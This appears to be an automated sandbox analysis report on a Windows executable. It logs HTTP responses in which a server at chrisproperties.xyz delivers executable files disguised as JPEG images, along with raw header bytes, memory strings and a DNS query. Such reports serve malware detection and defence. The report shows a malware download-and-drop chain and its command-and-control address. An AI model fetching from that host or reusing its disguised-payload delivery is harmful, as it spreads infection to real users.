00 f0 03 00 00 00 01 00 00 dc 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 2c 48 00 00 00 f0 04 00 00 04 00 00 00 dc 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 03 00 00 00 40 05 00 00 04 00 00 00 e0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 e0 16 00 00 00 50 05 00 00 18 00 00 00 e4 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 12 Oct 2021 10:35:37 GMTServer: Apache/2.4.48 (Unix) OpenSSL/1.0.2k-fipsLast-Modified: Thu, 06 Jun 2019 09:01:20 GMTETag: "217d0-58aa3f51a5800"Accept-Ranges: bytesContent-Length: 137168Vary: User-AgentKeep-Alive: timeout=5, max=97Connection: Keep-AliveContent-Type: image/jpegData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 8d c2 55 b1 c9 a3 3b e2 c9 a3 3b e2 c9 a3 3b e2 c0 db a8 e2 d9 a3 3b e2 57 03 fc e2 cb a3 3b e2 10 c1 38 e3 c7 a3 3b e2 10 c1 3f e3 c2 a3 3b e2 10 c1 3a e3 cd a3 3b e2 10 c1 3e e3 db a3 3b e2 eb c3 3a e3 c0 a3 3b e2 c9 a3 3a e2 77 a3 3b e2 02 c0 3f e3 c8 a3 3b e2 02 c0 3e e3 dd a3 3b e2 02 c0 3b e3 c8 a3 3b e2 02 c0 c4 e2 c8 a3 3b e2 02 c0 39 e3 c8 a3 3b e2 52 69 63 68 c9 a3 3b e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 c4 5f eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 7a 01 00 00 86 00 00 00 00 00 00 e0 82 01 00 00 10 00 00 00 90 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 40 02 00 00 04 00 00 16 33 02 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 40 c0 01 00 74 1e 00 00 b4 de 01 00 2c 01 00 00 00 20 02 00 78 03 00 00 00 00 00 00 00 00 00 00 00 fa 01 00 d0 1d 00 00 00 30 02 00 68 0c 00 00 00 b9 01 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 54 b9 01 00 18 00 00 00 68 b8 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 90 01 00 f4 02 00 00 6c be 01 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ca 78 01 00 00 10 00 00 00 7a 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 5e 65 00 00 00 90 01 00 00 66 00 00 00 7e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 bc 0b 00 00 00 00 02 00 00 02 00 00 00 e4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 69 64 61 74 00 00 38 00 00 00 00 10 02 00 00 02 00 00 00 e6 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 03 00 00 00 20 02 00 00 04 00 00 00 e8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 68 0c 00 00 00 30 02 00 00 0e 00 00 00 ec 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 12 Oct 2021 10:35:37 GMTServer: Apache/2.4.48 (Unix) OpenSSL/1.0.2k-fipsLast-Modified: Thu, 06 Jun 2019 09:01:30 GMTETag: "6b738-58aa3f5b2ee80"Accept-Ranges: bytesContent-Length: 440120Vary: User-AgentKeep-Alive: timeout=5, max=96Connection: Keep-AliveContent-Type: image/jpegData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a6 c8 bc 41 e2 a9 d2 12 e2 a9 d2 12 e2 a9 d2 12 56 35 3d 12 e0 a9 d2 12 eb d1 41 12 fa a9 d2 12 3b cb d3 13 e1 a9 d2 12 e2 a9 d3 12 22 a9 d2 12 3b cb d1 13 eb a9 d2 12 3b cb d6 13 ee a9 d2 12 3b cb d7 13 f4 a9 d2 12 3b cb da 13 95 a9 d2 12 3b cb d2 13 e3 a9 d2 12 3b cb 2d 12 e3 a9 d2 12 3b cb d0 13 e3 a9 d2 12 52 69 63 68 e2 a9 d2 12 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 16 38 27 59 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 04 06 00 00 82 00 00 00 00 00 00 50 b1 03 00 00 10 00 00 00 20 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 d0 06 00 00 04 00 00 61 7a 07 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 f0 43 04 00 82 cf 01 00 f4 52 06 00 2c 01 00 00 00 80 06 00 f8 03 00 00 00 00 00 00 00 00 00 00 00 78 06 00 38 3f 00 00 00 90 06 00 34 3a 00 00 f0 66 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 28 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 50 06 00 f0 02 00 00 98 40 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 72 03 06 00 00 10 00 00 00 04 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 10 28 00 00 00 20 06 00 00 18 00 00 00 08 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 36 14 00 00 00 50 06 00 00 16 00 00 00 20 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 70 06 00 00 02 00 00 00 36 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f8 03 00 00 00 80 06 00 00 04 00 00 00 38 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 34 3a 00 00 00 90 06 00 00 3c 00 00 00 3c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 12 Oct 2021 10:35:38 GMTServer: Apache/2.4.48 (Unix) OpenSSL/1.0.2k-fipsLast-Modified: Thu, 06 Jun 2019 09:01:44 GMTETag: "1303d0-58aa3f6888e00"Accept-Ranges: bytesContent-Length: 1246160Vary: User-AgentKeep-Alive: timeout=5, max=95Connection: Keep-AliveContent-Type: image/jpegData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 23 83 34 8c 67 e2 5a df 67 e2 5a df 67 e2 5a df 6e 9a c9 df 73 e2 5a df be 80 5b de 65 e2 5a df f9 42 9d df 63 e2 5a df be 80 59 de 6a e2 5a df be 80 5f de 6d e2 5a df be 80 5e de 6c e2 5a df 45 82 5b de 6f e2 5a df ac 81 5b de 64 e2 5a df 67 e2 5b df 90 e2 5a df ac 81 5e de 6d e3 5a df ac 81 5a de 66 e2 5a df ac 81 a5 df 66 e2 5a df ac 81 58 de 66 e2 5a df 52 69 63 68 67 e2 5a df 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 ad 62 eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 ea 0e 00 00 1e 04 00 00 00 00 00 77 f0 0e 00 00 10 00 00 00 00 0f 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 40 13 00 00 04 00 00 b7 bb 13 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 9d 11 00 88 a0 00 00 88 3d 12 00 54 01 00 00 00 b0 12 00 70 03 00 00 00 00 00 00 00 00 00 00 00 e6 12 00 d0 1d 00 00 00 c0 12 00 14 7d 00 00 70 97 11 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 97 11 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 f8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 81 e8 0e 00 00 10 00 00 00 ea 0e 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 10 52 03 00 00 00 0f 00 00 54 03 00 00 ee 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 74 47 00 00 00 60 12 00 00 22 00 00 00 42 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 70 03 00 00 00 b0 12 00 00 04 00 00 00 64 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 14 7d 00 00 00 c0 12 00 00 7e 00 00 00 68 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 12 Oct 2021 10:35:39 GMTServer: Apache/2.4.48 (Unix) OpenSSL/1.0.2k-fipsLast-Modified: Thu, 06 Jun 2019 09:02:02 GMTETag: "14748-58aa3f79b3680"Accept-Ranges: bytesContent-Length: 83784Vary: User-AgentKeep-Alive: timeout=5, max=94Connection: Keep-AliveContent-Type: image/jpegData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 01 f9 a3 4e 45 98 cd 1d 45 98 cd 1d 45 98 cd 1d f1 04 22 1d 47 98 cd 1d 4c e0 5e 1d 4e 98 cd 1d 45 98 cc 1d 6c 98 cd 1d 9c fa c9 1c 55 98 cd 1d 9c fa ce 1c 56 98 cd 1d 9c fa c8 1c 41 98 cd 1d 9c fa c5 1c 5f 98 cd 1d 9c fa cd 1c 44 98 cd 1d 9c fa 32 1d 44 98 cd 1d 9c fa cf 1c 44 98 cd 1d 52 69 63 68 45 98 cd 1d 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 0c 38 27 59 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 ea 00 00 00 20 00 00 00 00 00 00 00 ae 00 00 00 10 00 00 00 00 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 40 01 00 00 04 00 00 bc 11 02 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 b0 f0 00 00 14 09 00 00 c0 10 01 00 8c 00 00 00 00 20 01 00 08 04 00 00 00 00 00 00 00 00 00 00 00 08 01 00 48 3f 00 00 00 30 01 00 94 0a 00 00 b0 1f 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 1f 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 bc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c4 e9 00 00 00 10 00 00 00 ea 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 44 06 00 00 00 00 01 00 00 02 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 b8 05 00 00 00 10 01 00 00 06 00 00 00 f0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 08 04 00 00 00 20 01 00 00 06 00 00 00 f6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 0a 00 00 00 30 01 00 00 0c 00 00 00 fc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Source: buIKlB688e.exe, 00000005.00000003.377373701.0000000003337000.00000004.00000001.sdmp, mozglue.dll.5.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: buIKlB688e.exe, 00000005.00000003.377373701.0000000003337000.00000004.00000001.sdmp, mozglue.dll.5.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: buIKlB688e.exe, 00000005.00000002.389260406.0000000000E58000.00000004.00000020.sdmp	String found in binary or memory: http://chrisproperties.xyz/
Source: buIKlB688e.exe, 00000005.00000002.389260406.0000000000E58000.00000004.00000020.sdmp	String found in binary or memory: http://chrisproperties.xyz/1.jpg
Source: buIKlB688e.exe, 00000005.00000002.389260406.0000000000E58000.00000004.00000020.sdmp	String found in binary or memory: http://chrisproperties.xyz/1.jpg$
Source: buIKlB688e.exe, 00000005.00000002.389260406.0000000000E58000.00000004.00000020.sdmp	String found in binary or memory: http://chrisproperties.xyz/2.jpg
Source: buIKlB688e.exe, 00000005.00000002.389260406.0000000000E58000.00000004.00000020.sdmp	String found in binary or memory: http://chrisproperties.xyz/2.jpgB
Source: buIKlB688e.exe, 00000005.00000002.389260406.0000000000E58000.00000004.00000020.sdmp	String found in binary or memory: http://chrisproperties.xyz/3.jpg
Source: buIKlB688e.exe, 00000005.00000002.389260406.0000000000E58000.00000004.00000020.sdmp	String found in binary or memory: http://chrisproperties.xyz/4.jpg
Source: buIKlB688e.exe, 00000005.00000002.389260406.0000000000E58000.00000004.00000020.sdmp	String found in binary or memory: http://chrisproperties.xyz/4.jpg:
Source: buIKlB688e.exe, 00000005.00000002.389260406.0000000000E58000.00000004.00000020.sdmp	String found in binary or memory: http://chrisproperties.xyz/5.jpg
Source: buIKlB688e.exe, 00000005.00000002.389260406.0000000000E58000.00000004.00000020.sdmp	String found in binary or memory: http://chrisproperties.xyz/6.jpg
Source: buIKlB688e.exe, 00000005.00000002.389260406.0000000000E58000.00000004.00000020.sdmp	String found in binary or memory: http://chrisproperties.xyz/6.jpgj
Source: buIKlB688e.exe, 00000005.00000002.389260406.0000000000E58000.00000004.00000020.sdmp	String found in binary or memory: http://chrisproperties.xyz/7.jpg
Source: buIKlB688e.exe, 00000005.00000002.389260406.0000000000E58000.00000004.00000020.sdmp	String found in binary or memory: http://chrisproperties.xyz/main.php
Source: buIKlB688e.exe, 00000005.00000002.389260406.0000000000E58000.00000004.00000020.sdmp	String found in binary or memory: http://chrisproperties.xyz/main.php.
Source: buIKlB688e.exe, 00000005.00000003.377373701.0000000003337000.00000004.00000001.sdmp, mozglue.dll.5.dr	String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: buIKlB688e.exe, 00000005.00000003.377373701.0000000003337000.00000004.00000001.sdmp, mozglue.dll.5.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: buIKlB688e.exe, 00000005.00000003.377373701.0000000003337000.00000004.00000001.sdmp, mozglue.dll.5.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: buIKlB688e.exe, 00000005.00000003.377373701.0000000003337000.00000004.00000001.sdmp, mozglue.dll.5.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: buIKlB688e.exe, 00000005.00000003.377373701.0000000003337000.00000004.00000001.sdmp, mozglue.dll.5.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
Source: buIKlB688e.exe, 00000000.00000002.377590506.0000000006EC2000.00000004.00000001.sdmp	String found in binary or memory: http://fontfabrik.com
Source: buIKlB688e.exe, 00000005.00000003.377373701.0000000003337000.00000004.00000001.sdmp, mozglue.dll.5.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: buIKlB688e.exe, 00000005.00000003.377373701.0000000003337000.00000004.00000001.sdmp, mozglue.dll.5.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: buIKlB688e.exe, 00000005.00000003.377373701.0000000003337000.00000004.00000001.sdmp, mozglue.dll.5.dr	String found in binary or memory: http://ocsp.thawte.com0
Source: buIKlB688e.exe, 00000005.00000003.377373701.0000000003337000.00000004.00000001.sdmp, mozglue.dll.5.dr	String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: buIKlB688e.exe, 00000005.00000003.377373701.0000000003337000.00000004.00000001.sdmp, mozglue.dll.5.dr	String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: buIKlB688e.exe, 00000005.00000003.377373701.0000000003337000.00000004.00000001.sdmp, mozglue.dll.5.dr	String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: buIKlB688e.exe, 00000000.00000002.377590506.0000000006EC2000.00000004.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: buIKlB688e.exe, 00000000.00000002.377590506.0000000006EC2000.00000004.00000001.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: buIKlB688e.exe, 00000000.00000002.371640903.0000000002E74000.00000004.00000001.sdmp	String found in binary or memory: http://www.collada.org/2005/11/COLLADASchema9Done
Source: buIKlB688e.exe, 00000000.00000002.370505153.0000000001217000.00000004.00000040.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: buIKlB688e.exe, 00000000.00000002.377590506.0000000006EC2000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: buIKlB688e.exe, 00000000.00000002.377590506.0000000006EC2000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: buIKlB688e.exe, 00000000.00000002.377590506.0000000006EC2000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: buIKlB688e.exe, 00000000.00000002.377590506.0000000006EC2000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: buIKlB688e.exe, 00000000.00000002.377590506.0000000006EC2000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: buIKlB688e.exe, 00000000.00000002.377590506.0000000006EC2000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: buIKlB688e.exe, 00000000.00000002.377590506.0000000006EC2000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: buIKlB688e.exe, 00000000.00000002.370505153.0000000001217000.00000004.00000040.sdmp	String found in binary or memory: http://www.fontbureau.comic9
Source: buIKlB688e.exe, 00000000.00000002.370505153.0000000001217000.00000004.00000040.sdmp	String found in binary or memory: http://www.fontbureau.comiono$
Source: buIKlB688e.exe, 00000000.00000002.370505153.0000000001217000.00000004.00000040.sdmp	String found in binary or memory: http://www.fontbureau.comoj
Source: buIKlB688e.exe, 00000000.00000002.377590506.0000000006EC2000.00000004.00000001.sdmp	String found in binary or memory: http://www.fonts.com
Source: buIKlB688e.exe, 00000000.00000002.377590506.0000000006EC2000.00000004.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: buIKlB688e.exe, 00000000.00000002.377590506.0000000006EC2000.00000004.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: buIKlB688e.exe, 00000000.00000002.377590506.0000000006EC2000.00000004.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: buIKlB688e.exe, 00000000.00000002.377590506.0000000006EC2000.00000004.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: buIKlB688e.exe, 00000000.00000002.377590506.0000000006EC2000.00000004.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: buIKlB688e.exe, 00000000.00000002.377590506.0000000006EC2000.00000004.00000001.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: buIKlB688e.exe, 00000000.00000002.377590506.0000000006EC2000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: mozglue.dll.5.dr	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: buIKlB688e.exe, 00000005.00000003.377373701.0000000003337000.00000004.00000001.sdmp, mozglue.dll.5.dr	String found in binary or memory: http://www.mozilla.com0
Source: buIKlB688e.exe, 00000000.00000002.377590506.0000000006EC2000.00000004.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: buIKlB688e.exe, 00000000.00000002.377590506.0000000006EC2000.00000004.00000001.sdmp	String found in binary or memory: http://www.sakkal.com
Source: buIKlB688e.exe, 00000000.00000002.377590506.0000000006EC2000.00000004.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: buIKlB688e.exe, 00000000.00000002.377590506.0000000006EC2000.00000004.00000001.sdmp	String found in binary or memory: http://www.tiro.com
Source: buIKlB688e.exe, 00000000.00000002.377590506.0000000006EC2000.00000004.00000001.sdmp	String found in binary or memory: http://www.typography.netD
Source: buIKlB688e.exe, 00000000.00000002.377590506.0000000006EC2000.00000004.00000001.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: buIKlB688e.exe, 00000000.00000002.377590506.0000000006EC2000.00000004.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: temp.5.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: temp.5.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: temp.5.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: temp.5.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: temp.5.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtabSQLite
Source: temp.5.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: temp.5.dr	String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: temp.5.dr	String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: buIKlB688e.exe, 00000005.00000002.389874310.0000000003320000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
Source: buIKlB688e.exe, 00000005.00000002.389874310.0000000003320000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/answer/6258784
Source: buIKlB688e.exe, 00000005.00000003.377373701.0000000003337000.00000004.00000001.sdmp, mozglue.dll.5.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: temp.5.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

Source: unknown

DNS traffic detected: queries for: chrisproperties.xyz

Source: C:\Users\user\Desktop\buIKlB688e.exe

Code function: 5_2_00421CF0 InternetSetFilePointer,InternetReadFile,_memset,HttpQueryInfoA,_memcpy_s,_memcpy_s,

5_2_00421CF0

Source: buIKlB688e.exe, 00000000.00000002.370724291.0000000001280000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

Source: buIKlB688e.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: C:\Users\user\Desktop\buIKlB688e.exe	Code function: 0_2_00A34351	0_2_00A34351
Source: C:\Users\user\Desktop\buIKlB688e.exe	Code function: 0_2_0120C124	0_2_0120C124
Source: C:\Users\user\Desktop\buIKlB688e.exe	Code function: 0_2_0120E560	0_2_0120E560
Source: C:\Users\user\Desktop\buIKlB688e.exe	Code function: 0_2_0120E570	0_2_0120E570
Source: C:\Users\user\Desktop\buIKlB688e.exe	Code function: 4_2_00314351	4_2_00314351
Source: C:\Users\user\Desktop\buIKlB688e.exe	Code function: 5_2_00413480	5_2_00413480
